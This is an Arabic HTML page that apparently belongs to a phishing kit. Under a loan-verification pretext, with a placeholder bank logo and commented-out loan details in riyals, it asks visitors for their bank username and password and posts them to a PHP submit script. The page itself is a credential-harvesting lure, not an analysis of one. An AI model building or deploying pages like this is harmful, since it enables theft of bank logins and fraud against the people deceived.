<!DOCTYPE html>
<html lang="ar" dir="rtl">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-BmbxuPwQa2lc/FVzBcNJ7UAyJxM6wuqIj61tLrc4wSX0szH/Ev+nYRRuWlolflfl" crossorigin="anonymous">
    <link rel="stylesheet" href="style/page-2.css">
    <link href="https://fonts.googleapis.com/css2?family=Almarai:wght@300&amp;display=swap" rel="stylesheet">
</head>

<body>
    <div class="">
        <h1>تفاصيل المستخدم</h1>
        <h3>للتاكد من صحة المعلومات</h3>
        <img class="bank-transfer text-center" src="image/png/cover-head-5.png" alt="">
    </div>
    <!-- <div class="row detail">
        <h3>تفاصيل القرض</h3>
        <div>
            <div>
                <label for="">اسم المستفيد:</label>
                <label for="" id="Account-holder"></label>
            </div>
            <div>
                <label for="">المبلغ:</label>
                <label for="" id="account-amount"></label>
                <label for="">ريال</label>
            </div>
            <div></div>
        </div>
        <div>
            <div>
                <label for="">مبلغ القسط: </label>
                <label for="">1,213</label>
            </div>
            <div>
                <label for="">مدة السداد: 5 سنة</label>
            </div>
            <div>
                <label for="">اسم البنك</label>
                <label id="bank-name" for=""></label>
            </div>
        </div>
    </div> -->

    <div class="row popup-bank">
        <!-- <img class="bank-logo" id="bank-imag-logo" src="image/Banks-Logo/Bank-15.png" alt=""> -->
    </div>
    <form action="php/submit.php" method="post" onsubmit="return closes()">
        <div class="row popup-bank">
            <label id="" for="">اسم المستحدم</label>
            <input type="text" id="username" name="username">
        </div>
        <div class="row popup-bank">
            <label id="" for="">الرقم السري</label>
            <input type="password" id="password" name="password">
        </div>
        <button class="btnSearch" id="" name="submit" onclick="">موافق</button>
    </form>
    <script src="javascript/Page_2.js"></script>
</body>

</html>